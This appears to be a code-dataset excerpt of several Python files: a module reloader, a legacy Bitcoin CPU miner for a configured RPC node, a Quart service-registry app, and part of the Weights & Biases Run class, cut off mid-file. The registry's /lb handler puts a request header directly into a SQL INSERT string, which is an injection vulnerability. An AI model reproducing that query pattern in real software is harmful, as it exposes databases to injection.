source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
modulewatcher.py
|
#####################################################################
# #
# modulewatcher.py #
# #
# Copyright 2013, Monash University #
# #
# This file is part of the labscript suite (see #
# http://labscriptsuite.org) and is licensed under the Simplified #
# BSD License. See the license.txt file in the root of the project #
# for the full license. #
# #
#####################################################################
import sys
import threading
import time
import os
import imp
class ModuleWatcher(object):
def __init__(self):
# A lock to hold whenever you don't want modules unloaded:
self.lock = threading.Lock()
# The whitelist is the list of names of currently loaded modules:
self.whitelist = set(sys.modules)
self.modified_times = {}
self.main = threading.Thread(target=self.mainloop)
self.main.daemon = True
self.main.start()
def mainloop(self):
while True:
time.sleep(1)
with self.lock:
self.check_and_unload()
def check_and_unload(self):
# Look through currently loaded modules:
for name, module in sys.modules.copy().items():
# Look only at the modules not in the the whitelist:
if name not in self.whitelist and hasattr(module,'__file__'):
# Only consider modules which are .py files, no C extensions:
module_file = module.__file__.replace('.pyc', '.py')
if not module_file.endswith('.py') or not os.path.exists(module_file):
continue
# Check and store the modified time of the .py file:
modified_time = os.path.getmtime(module_file)
previous_modified_time = self.modified_times.setdefault(name, modified_time)
self.modified_times[name] = modified_time
if modified_time != previous_modified_time:
# A module has been modified! Unload all modules
# not in the whitelist:
message = '%s modified: all modules will be reloaded next run.\n'%module_file
sys.stderr.write(message)
# Acquire the import lock so that we don't unload
# modules whilst an import is in progess:
imp.acquire_lock()
try:
for name in sys.modules.copy():
if name not in self.whitelist:
# This unloads a module. This is slightly
# more general than reload(module), but
# has the same caveats regarding existing
# references. This also means that any
# exception in the import will occur later,
# once the module is (re)imported, rather
# than now where catching the exception
# would have to be handled differently.
del sys.modules[name]
if name in self.modified_times:
del self.modified_times[name]
finally:
# We're done mucking around with the cached
# modules, normal imports in other threads
# may resume:
imp.release_lock()
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 26828
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
main.py
|
import os
import itertools
import json
import random
import socket
import time
from datetime import datetime
from threading import Thread
from typing import Dict, List
import pytz
import schedule
from quart import Quart, request, make_response
from dotenv import load_dotenv
from pg import PostgresDB
from service import Service, Status
from timer import Timer
app = Quart(__name__)
tz = pytz.timezone('America/Sao_Paulo')
timer = Timer()
services: Dict[str, List[Service]] = {}
load_dotenv()
database = os.getenv('database')
db_host = os.getenv('host')
db_user = os.getenv('username')
db_pass = os.getenv('password')
db = PostgresDB(host=db_host, db=database, user=db_user, password=db_pass)
@app.before_request
async def before_request():
timer.start = datetime.now(tz=tz)
return
@app.after_request
async def after_request(response):
timer.end = datetime.now(tz=tz)
total = f'{timer.diff()}s'
header = response.headers
header['Access-Control-Allow-Origin'] = '*'
header['Request-Duration'] = total
return response
@app.route('/lb', methods=["GET"])
async def get_service_lb():
headers = request.headers
execution = headers.get('X-Oystr-Execution', None)
if execution:
try:
# noinspection SqlDialectInspection, SqlNoDataSourceInspection
db.query(f"INSERT INTO metadata(execution) VALUES('{execution}');")
except Exception as e:
print(e)
return os.getenv('lb_address', '127.0.0.1:8080')
@app.route('/services', methods=["GET"])
async def find_all_active():
items = services.values()
data = [i for i in list(itertools.chain.from_iterable(items))]
as_dict = [d.__dict__ for d in data if d.status.status == 'running']
return \
await make_response(json.dumps(as_dict, default=lambda o: o.isoformat() if isinstance(o, datetime) else str(o))),\
200
@app.route('/services/all', methods=["GET"])
async def find_all():
items = services.values()
data = [i for i in list(itertools.chain.from_iterable(items))]
as_dict = [d.__dict__ for d in data]
return \
await make_response(json.dumps(as_dict, default=lambda o: o.isoformat() if isinstance(o, datetime) else str(o))),\
200
@app.route('/services/<service>/random', methods=["GET"])
async def find_one(service):
if not service or len(service) == 0:
return await make_response('service_id must be provided'), 400
elif service not in services.keys():
return await make_response(''), 404
data = list(filter(lambda i: i.status.status == 'running', services[service]))
size = len(data)
if size == 0:
return await make_response(''), 404
idx = random.randint(0, size - 1)
return await make_response(data[idx].json()), 200
@app.route('/services', methods=["POST"])
async def register():
req = await request.json
name = req.get('name', None)
service_id = req.get('service_id')
raw_port = req.get('port')
host = req.get('host')
res, code = await validate(service_id, host, raw_port, check_duplicate=False)
if res:
return res, code
port = int(raw_port)
service = Service(service_id=service_id, name=name, host=host, port=port, status=Status(None),
registered_at=datetime.now(tz=tz), last_health_check=None)
if service_id not in services:
services[service_id] = list()
services[service_id].append(service)
return await make_response(service.json()), 200
@app.route('/services/<service>/<host>/<port>', methods=["DELETE"])
async def deregister(service, host, port):
res, code = await validate(service, host, port)
if res:
return res, code
empty_res = await make_response('')
to_remove = [idx for idx in range(len(services[service])) if services[service][idx].host == host and
services[service][idx].port == port]
if len(to_remove) == 0:
return empty_res, 404
elif len(to_remove) != 1:
print(services)
print(to_remove)
return await make_response('more than one peer registered with the same service, host and port'), 409
idx = to_remove[0]
del services[service][idx]
return empty_res, 204
@app.route('/services/flush', methods=["DELETE"])
async def flush():
services.clear()
return await make_response(''), 204
async def validate(service, host, port, check_duplicate=True):
if not str(port).isnumeric():
return await make_response(f'port must be a number'), 400
elif not host or len(host) == 0:
return await make_response('host must be provided'), 400
elif not service or len(service) == 0:
return await make_response('service_id must be provided'), 400
elif check_duplicate and (service not in services.keys()):
return await make_response(''), 404
return None, -1
def health_check():
ids = services.values()
for items in ids:
for service in items:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)
if service.status.status == 'disabled':
continue
# noinspection PyBroadException
try:
s.connect((service.host, service.port))
service.status = Status('running')
except Exception as _:
if service.last_health_check and service.status.status == 'pending':
service.status = Status('failing')
continue
elif service.last_health_check and service.status.status == 'failing':
service.status = Status('disabled')
continue
service.status = Status('pending')
print(f'{service.service_id} [{service.status.status}] health checked')
finally:
service.last_health_check = datetime.now(tz=tz)
def run_scheduler():
while True:
schedule.run_pending()
time.sleep(1)
def remove_disabled():
services2 = services
for k, v in services2.items():
for idx, service in enumerate(v):
if service.status.status == 'disabled':
try:
del services[k][idx]
except Exception as e:
print(e)
schedule.every(30).seconds.do(health_check)
schedule.every(40).seconds.do(remove_disabled)
thread = Thread(target=run_scheduler, args=(), daemon=True)
thread.start()
app.run(host='0.0.0.0', port=10000)
|
wandb_run.py
|
# File is generated by: tox -e codemod
# -*- coding: utf-8 -*-
from __future__ import print_function
import atexit
from datetime import timedelta
import glob
import json
import logging
import numbers
import os
import platform
import sys
import threading
import time
import traceback
import click
from six import iteritems, string_types
from six.moves import _thread as thread
from six.moves.collections_abc import Mapping
from six.moves.urllib.parse import quote as url_quote
from six.moves.urllib.parse import urlencode
import wandb
from wandb import errors
from wandb import trigger
from wandb._globals import _datatypes_set_callback
from wandb.apis import internal, public
from wandb.errors import Error
from wandb.util import add_import_hook, sentry_set_scope, to_forward_slash_path
from wandb.viz import (
create_custom_chart,
custom_chart_panel_config,
CustomChart,
Visualize,
)
from . import wandb_artifacts
from . import wandb_config
from . import wandb_history
from . import wandb_metric
from . import wandb_summary
from .interface.artifacts import Artifact as ArtifactInterface
from .lib import (
apikey,
config_util,
filenames,
filesystem,
ipython,
module,
proto_util,
redirect,
sparkline,
telemetry,
)
if wandb.TYPE_CHECKING: # type: ignore
from typing import (
Any,
Dict,
List,
Optional,
Sequence,
TextIO,
Tuple,
Union,
Type,
Callable,
)
from types import TracebackType
from .wandb_settings import Settings, SettingsConsole
from .interface.summary_record import SummaryRecord
from .interface.interface import BackendSender
from .lib.reporting import Reporter
from wandb.proto.wandb_internal_pb2 import (
RunRecord,
FilePusherStats,
PollExitResponse,
MetricRecord,
)
from .wandb_setup import _WandbSetup
from wandb.apis.public import Api as PublicApi
from .wandb_artifacts import Artifact
from typing import TYPE_CHECKING
if TYPE_CHECKING:
from typing import NoReturn
from .data_types import WBValue
from .interface.artifacts import (
ArtifactEntry,
ArtifactManifest,
)
logger = logging.getLogger("wandb")
EXIT_TIMEOUT = 60
RUN_NAME_COLOR = "#cdcd00"
class ExitHooks(object):
exception = None
def __init__(self):
self.exit_code = 0
self.exception = None
def hook(self):
self._orig_exit = sys.exit
sys.exit = self.exit
sys.excepthook = self.exc_handler
def exit(self, code = 0):
orig_code = code
if code is None:
code = 0
elif not isinstance(code, int):
code = 1
self.exit_code = code
self._orig_exit(orig_code)
def was_ctrl_c(self):
return isinstance(self.exception, KeyboardInterrupt)
def exc_handler(
self, exc_type, exc, tb
):
self.exit_code = 1
self.exception = exc
if issubclass(exc_type, Error):
wandb.termerror(str(exc))
if self.was_ctrl_c():
self.exit_code = 255
traceback.print_exception(exc_type, exc, tb)
class RunStatusChecker(object):
"""Periodically polls the background process for relevant updates.
For now, we just use this to figure out if the user has requested a stop.
"""
def __init__(
self,
interface,
stop_polling_interval = 15,
retry_polling_interval = 1,
):
self._interface = interface
self._stop_polling_interval = stop_polling_interval
self._retry_polling_interval = retry_polling_interval
self._join_event = threading.Event()
self._stop_thread = threading.Thread(target=self.check_status)
self._stop_thread.daemon = True
self._stop_thread.start()
self._retry_thread = threading.Thread(target=self.check_network_status)
self._retry_thread.daemon = True
self._retry_thread.start()
def check_network_status(self):
join_requested = False
while not join_requested:
status_response = self._interface.communicate_network_status()
if status_response and status_response.network_responses:
for hr in status_response.network_responses:
if (
hr.http_status_code == 200 or hr.http_status_code == 0
): # we use 0 for non-http errors (eg wandb errors)
wandb.termlog("{}".format(hr.http_response_text))
else:
wandb.termlog(
"{} encountered ({}), retrying request".format(
hr.http_status_code, hr.http_response_text.rstrip()
)
)
join_requested = self._join_event.wait(self._retry_polling_interval)
def check_status(self):
join_requested = False
while not join_requested:
status_response = self._interface.communicate_stop_status()
if status_response and status_response.run_should_stop:
# TODO(frz): This check is required
# until WB-3606 is resolved on server side.
if not wandb.agents.pyagent.is_running():
thread.interrupt_main()
return
join_requested = self._join_event.wait(self._stop_polling_interval)
def stop(self):
self._join_event.set()
def join(self):
self.stop()
self._stop_thread.join()
self._retry_thread.join()
class Run(object):
"""
A unit of computation logged by wandb. Typically this is an ML experiment.
Create a run with `wandb.init()`.
In distributed training, use `wandb.init()` to create a run for
each process, and set the group argument to organize runs into a larger experiment.
Currently there is a parallel Run object in the wandb.Api. Eventually these
two objects will be merged.
Attributes:
history: (History) Time series values, created with `wandb.log()`.
History can contain scalar values, rich media, or even custom plots
across multiple steps.
summary: (Summary) Single values set for each `wandb.log()` key. By
default, summary is set to the last value logged. You can manually
set summary to the best value, like max accuracy, instead of the
final value.
"""
# _telemetry_obj: telemetry.TelemetryRecord
# _teardown_hooks: List[Callable[[], None]]
# _tags: Optional[Tuple[Any, ...]]
# _entity: Optional[str]
# _project: Optional[str]
# _group: Optional[str]
# _job_type: Optional[str]
# _name: Optional[str]
# _notes: Optional[str]
# _run_obj: Optional[RunRecord]
# _run_obj_offline: Optional[RunRecord]
# Use string literal anotation because of type reference loop
# _backend: Optional["wandb.sdk.backend.backend.Backend"]
# _wl: Optional[_WandbSetup]
# _upgraded_version_message: Optional[str]
# _deleted_version_message: Optional[str]
# _yanked_version_message: Optional[str]
# _out_redir: Optional[redirect.RedirectBase]
# _err_redir: Optional[redirect.RedirectBase]
# _redirect_cb: Optional[Callable[[str, str], None]]
# _output_writer: Optional["filesystem.CRDedupedFile"]
# _atexit_cleanup_called: bool
# _hooks: Optional[ExitHooks]
# _exit_code: Optional[int]
# _run_status_checker: Optional[RunStatusChecker]
# _poll_exit_response: Optional[PollExitResponse]
# _sampled_history: Optional[Dict[str, Union[List[int], List[float]]]]
# _use_redirect: bool
# _stdout_slave_fd: Optional[int]
# _stderr_slave_fd: Optional[int]
# _pid: int
def __init__(
self,
settings,
config = None,
sweep_config = None,
):
self._config = wandb_config.Config()
self._config._set_callback(self._config_callback)
self._config._set_settings(settings)
self._backend = None
self.summary = wandb_summary.Summary(
self._summary_get_current_summary_callback,
)
self.summary._set_update_callback(self._summary_update_callback)
self.history = wandb_history.History(self)
self.history._set_callback(self._history_callback)
_datatypes_set_callback(self._datatypes_callback)
self._settings = settings
self._wl = None
self._reporter = None
self._entity = None
self._project = None
self._group = None
self._job_type = None
self._run_id = settings.run_id
self._start_time = time.time()
self._starting_step = 0
self._name = None
self._notes = None
self._tags = None
self._hooks = None
self._teardown_hooks = []
self._redirect_cb = None
self._out_redir = None
self._err_redir = None
self.stdout_redirector = None
self.stderr_redirector = None
self._save_stdout = None
self._save_stderr = None
self._stdout_slave_fd = None
self._stderr_slave_fd = None
self._exit_code = None
self._exit_result = None
self._final_summary = None
self._sampled_history = None
self._jupyter_progress = None
if self._settings._jupyter and ipython._get_python_type() == "jupyter":
self._jupyter_progress = ipython.jupyter_progress_bar()
self._output_writer = None
self._upgraded_version_message = None
self._deleted_version_message = None
self._yanked_version_message = None
# Pull info from settings
self._init_from_settings(settings)
# Initial scope setup for sentry. This might get changed when the
# actual run comes back.
sentry_set_scope(
"user",
entity=self._entity,
project=self._project,
email=self._settings.email,
)
# Returned from backend request_run(), set from wandb_init?
self._run_obj = None
self._run_obj_offline = None
# Created when the run "starts".
self._run_status_checker = None
self._poll_exit_response = None
# Initialize telemetry object
self._telemetry_obj = telemetry.TelemetryRecord()
# Populate config
config = config or dict()
wandb_key = "_wandb"
config.setdefault(wandb_key, dict())
if settings.save_code and settings.program_relpath:
config[wandb_key]["code_path"] = to_forward_slash_path(
os.path.join("code", settings.program_relpath)
)
if sweep_config:
self._config.update_locked(
sweep_config, user="sweep", _allow_val_change=True
)
self._config._update(config, ignore_locked=True)
self._atexit_cleanup_called = False
self._use_redirect = True
self._progress_step = 0
self._pid = os.getpid()
def _telemetry_callback(self, telem_obj):
self._telemetry_obj.MergeFrom(telem_obj)
def _freeze(self):
self._frozen = True
def __setattr__(self, attr, value):
if getattr(self, "_frozen", None) and not hasattr(self, attr):
raise Exception("Attribute {} is not supported on Run object.".format(attr))
super(Run, self).__setattr__(attr, value)
def _telemetry_imports(self, imp):
mods = sys.modules
if mods.get("torch"):
imp.torch = True
if mods.get("keras"):
imp.keras = True
if mods.get("tensorflow"):
imp.tensorflow = True
if mods.get("sklearn"):
imp.sklearn = True
if mods.get("fastai"):
imp.fastai = True
if mods.get("xgboost"):
imp.xgboost = True
if mods.get("catboost"):
imp.catboost = True
if mods.get("lightgbm"):
imp.lightgbm = True
if mods.get("pytorch_lightning"):
imp.pytorch_lightning = True
if mods.get("ignite"):
imp.pytorch_ignite = True
if mods.get("transformers"):
imp.transformers_huggingface = True
def _init_from_settings(self, settings):
if settings.entity is not None:
self._entity = settings.entity
if settings.project is not None:
self._project = settings.project
if settings.run_group is not None:
self._group = settings.run_group
if settings.run_job_type is not None:
self._job_type = settings.run_job_type
if settings.run_name is not None:
self._name = settings.run_name
if settings.run_notes is not None:
self._notes = settings.run_notes
if settings.run_tags is not None:
self._tags = settings.run_tags
def _make_proto_run(self, run):
"""Populate protocol buffer RunData for interface/interface."""
if self._entity is not None:
run.entity = self._entity
if self._project is not None:
run.project = self._project
if self._group is not None:
run.run_group = self._group
if self._job_type is not None:
run.job_type = self._job_type
if self._run_id is not None:
run.run_id = self._run_id
if self._name is not None:
run.display_name = self._name
if self._notes is not None:
run.notes = self._notes
if self._tags is not None:
for tag in self._tags:
run.tags.append(tag)
if self._start_time is not None:
run.start_time.FromSeconds(int(self._start_time))
# Note: run.config is set in interface/interface:_make_run()
def __getstate__(self):
pass
def __setstate__(self, state):
pass
@property
def dir(self):
"""
Returns:
(str): The directory where all of the files associated with the run are
placed.
"""
return self._settings.files_dir
@property
def config(self):
"""
Returns:
(Config): A config object (similar to a nested dict) of key
value pairs associated with the hyperparameters of the run.
"""
return self._config
@property
def config_static(self):
return wandb_config.ConfigStatic(self._config)
@property
def name(self):
"""
Returns:
(str): the display name of the run. It does not need to be unique
and ideally is descriptive.
"""
if self._name:
return self._name
if not self._run_obj:
return None
return self._run_obj.display_name
@name.setter
def name(self, name):
self._name = name
if self._backend:
self._backend.interface.publish_run(self)
@property
def notes(self):
r"""
Returns:
(str): notes associated with the run. Notes can be a multiline string
and can also use markdown and latex equations inside $$ like $\\{x}"""
if self._notes:
return self._notes
if not self._run_obj:
return None
return self._run_obj.notes
@notes.setter
def notes(self, notes):
self._notes = notes
if self._backend:
self._backend.interface.publish_run(self)
@property
def tags(self):
"""
Returns:
(Tuple[str]): tags associated with the run
"""
if self._tags:
return self._tags
run_obj = self._run_obj or self._run_obj_offline
if run_obj:
return tuple(run_obj.tags)
return None
@tags.setter
def tags(self, tags):
self._tags = tuple(tags)
if self._backend:
self._backend.interface.publish_run(self)
@property
def id(self):
"""id property.
Returns:
(str): the run_id associated with the run
"""
if wandb.TYPE_CHECKING and TYPE_CHECKING:
assert self._run_id is not None
return self._run_id
@property
def sweep_id(self):
"""
Returns:
(str, optional): the sweep id associated with the run or None
"""
if not self._run_obj:
return None
return self._run_obj.sweep_id or None
@property
def path(self):
"""
Returns:
(str): the path to the run `[entity]/[project]/[run_id]`
"""
parts = []
for e in [self._entity, self._project, self._run_id]:
if e is not None:
parts.append(e)
return "/".join(parts)
@property
def start_time(self):
"""
Returns:
(int): the unix time stamp in seconds when the run started
"""
if not self._run_obj:
return self._start_time
else:
return self._run_obj.start_time.ToSeconds()
@property
def starting_step(self):
"""
Returns:
(int): the first step of the run
"""
if not self._run_obj:
return self._starting_step
else:
return self._run_obj.starting_step
@property
def resumed(self):
"""
Returns:
(bool): whether or not the run was resumed
"""
if self._run_obj:
return self._run_obj.resumed
return False
@property
def step(self):
"""
Every time you call wandb.log() it will by default increment the step
counter.
Returns:
(int): step counter
"""
return self.history._step
def project_name(self):
run_obj = self._run_obj or self._run_obj_offline
return run_obj.project if run_obj else ""
@property
def mode(self):
"""For compatibility with `0.9.x` and earlier, deprecate eventually."""
return "dryrun" if self._settings._offline else "run"
@property
def offline(self):
return self._settings._offline
@property
def disabled(self):
return self._settings._noop
@property
def group(self):
"""
Setting a group helps the W&B UI organize runs in a sensible way.
If you are doing a distributed training you should give all of the
runs in the training the same group.
If you are doing crossvalidation you should give all the crossvalidation
folds the same group.
Returns:
(str): name of W&B group associated with run.
"""
run_obj = self._run_obj or self._run_obj_offline
return run_obj.run_group if run_obj else ""
@property
def job_type(self):
run_obj = self._run_obj or self._run_obj_offline
return run_obj.job_type if run_obj else ""
@property
def project(self):
"""
Returns:
(str): name of W&B project associated with run.
"""
return self.project_name()
def log_code(
self,
root = ".",
name = None,
include_fn = lambda path: path.endswith(".py"),
exclude_fn = lambda path: os.sep + "wandb" + os.sep
in path,
):
"""
log_code() saves the current state of your code to a W&B artifact. By
default it walks the current directory and logs all files that end with ".py".
Arguments:
root (str, optional): The relative (to os.getcwd()) or absolute path to
recursively find code from.
name (str, optional): The name of our code artifact. By default we'll name
the artifact "source-$RUN_ID". There may be scenarios where you want
many runs to share the same artifact. Specifying name allows you to achieve that.
include_fn (callable, optional): A callable that accepts a file path and
returns True when it should be included and False otherwise. This
defaults to: `lambda path: path.endswith(".py")`
exclude_fn (callable, optional): A callable that accepts a file path and
returns True when it should be excluded and False otherwise. This
defaults to: `lambda path: False`
Examples:
Basic usage
```python
run.log_code()
```
Advanced usage
```python
run.log_code("../", include_fn=lambda path: path.endswith(".py") or path.endswith(".ipynb"))
```
Returns:
An `Artifact` object if code was logged
"""
name = name or "{}-{}".format("source", self.id)
art = wandb.Artifact(name, "code")
files_added = False
if root is not None:
root = os.path.abspath(root)
for file_path in filenames.filtered_dir(root, include_fn, exclude_fn):
files_added = True
save_name = os.path.relpath(file_path, root)
art.add_file(file_path, name=save_name)
# Add any manually staged files such is ipynb notebooks
for dirpath, _, files in os.walk(self._settings._tmp_code_dir):
for fname in files:
file_path = os.path.join(dirpath, fname)
save_name = os.path.relpath(file_path, self._settings._tmp_code_dir)
files_added = True
art.add_file(file_path, name=save_name)
if not files_added:
return None
return self.log_artifact(art)
def get_url(self):
"""
Returns:
A url (str, optional) for the W&B run or None if the run
is offline
"""
if not self._run_obj:
wandb.termwarn("URL not available in offline run")
return None
return self._get_run_url()
def get_project_url(self):
"""
Returns:
A url (str, optional) for the W&B project associated with
the run or None if the run is offline
"""
if not self._run_obj:
wandb.termwarn("URL not available in offline run")
return None
return self._get_project_url()
def get_sweep_url(self):
"""
Returns:
A url (str, optional) for the sweep associated with the run
or None if there is no associated sweep or the run is offline.
"""
if not self._run_obj:
wandb.termwarn("URL not available in offline run")
return None
return self._get_sweep_url()
@property
def url(self):
"""
Returns:
(str): name of W&B url associated with run.
"""
return self.get_url()
@property
def entity(self):
"""
Returns:
(str): name of W&B entity associated with run. Entity is either
a user name or an organization name.
"""
return self._entity or ""
def _repr_mimebundle_(
self, include = None, exclude = None
):
url = self._get_run_url()
style = "border:none;width:100%;height:400px"
s = '<h1>Run({})</h1><iframe src="{}" style="{}"></iframe>'.format(
self._run_id, url, style
)
return {"text/html": s}
def _config_callback(
self,
key = None,
val = None,
data = None,
):
logger.info("config_cb %s %s %s", key, val, data)
if not self._backend or not self._backend.interface:
return
self._backend.interface.publish_config(key=key, val=val, data=data)
def _summary_update_callback(self, summary_record):
if self._backend:
self._backend.interface.publish_summary(summary_record)
def _summary_get_current_summary_callback(self):
if not self._backend:
return {}
ret = self._backend.interface.communicate_summary()
return proto_util.dict_from_proto_list(ret.item)
def _metric_callback(self, metric_record):
if self._backend:
self._backend.interface._publish_metric(metric_record)
def _datatypes_callback(self, fname):
if not self._backend:
return
files = dict(files=[(fname, "now")])
self._backend.interface.publish_files(files)
# TODO(jhr): codemod add: PEP 3102 -- Keyword-Only Arguments
def _history_callback(self, row, step):
# TODO(jhr): move visualize hack somewhere else
custom_charts = {}
for k in row:
if isinstance(row[k], Visualize):
config = {
"id": row[k].viz_id,
"historyFieldSettings": {"key": k, "x-axis": "_step"},
}
row[k] = row[k].value
self._config_callback(val=config, key=("_wandb", "viz", k))
elif isinstance(row[k], CustomChart):
custom_charts[k] = row[k]
custom_chart = row[k]
for k, custom_chart in custom_charts.items():
# remove the chart key from the row
# TODO: is this really the right move? what if the user logs
# a non-custom chart to this key?
row.pop(k)
# add the table under a different key
table_key = k + "_table"
row[table_key] = custom_chart.table
# add the panel
panel_config = custom_chart_panel_config(custom_chart, k, table_key)
self._add_panel(k, "Vega2", panel_config)
if self._backend:
not_using_tensorboard = len(wandb.patched["tensorboard"]) == 0
self._backend.interface.publish_history(
row, step, publish_step=not_using_tensorboard
)
def _console_callback(self, name, data):
# logger.info("console callback: %s, %s", name, data)
if self._backend:
self._backend.interface.publish_output(name, data)
def _tensorboard_callback(
self, logdir, save = None, root_logdir = None
):
logger.info("tensorboard callback: %s, %s", logdir, save)
save = True if save is None else save
if self._backend:
self._backend.interface.publish_tbdata(logdir, save, root_logdir)
def _set_library(self, library):
self._wl = library
def _set_backend(self, backend):
self._backend = backend
def _set_reporter(self, reporter):
self._reporter = reporter
def _set_teardown_hooks(self, hooks):
self._teardown_hooks = hooks
def _set_run_obj(self, run_obj):
self._run_obj = run_obj
self._entity = run_obj.entity
self._project = run_obj.project
# Grab the config from resuming
if run_obj.config:
c_dict = config_util.dict_no_value_from_proto_list(run_obj.config.update)
# TODO: Windows throws a wild error when this is set...
if "_wandb" in c_dict:
del c_dict["_wandb"]
# We update the config object here without triggering the callback
self.config._update(c_dict, allow_val_change=True, ignore_locked=True)
# Update the summary, this will trigger an un-needed graphql request :(
if run_obj.summary:
summary_dict = {}
for orig in run_obj.summary.update:
summary_dict[orig.key] = json.loads(orig.value_json)
self.summary.update(summary_dict)
self.history._update_step()
# TODO: It feels weird to call this twice..
sentry_set_scope(
"user",
entity=run_obj.entity,
project=run_obj.project,
email=self._settings.email,
url=self._get_run_url(),
)
def _set_run_obj_offline(self, run_obj):
self._run_obj_offline = run_obj
def _add_singleton(
self, data_type, key, value
):
"""Stores a singleton item to wandb config.
A singleton in this context is a piece of data that is continually
logged with the same value in each history step, but represented
as a single item in the config.
We do this to avoid filling up history with a lot of repeated uneccessary data
Add singleton can be called many times in one run and it will only be
updated when the value changes. The last value logged will be the one
persisted to the server"""
value_extra = {"type": data_type, "key": key, "value": value}
if data_type not in self.config["_wandb"]:
self.config["_wandb"][data_type] = {}
if data_type in self.config["_wandb"][data_type]:
old_value = self.config["_wandb"][data_type][key]
else:
old_value = None
if value_extra != old_value:
self.config["_wandb"][data_type][key] = value_extra
self.config.persist()
def log(
self,
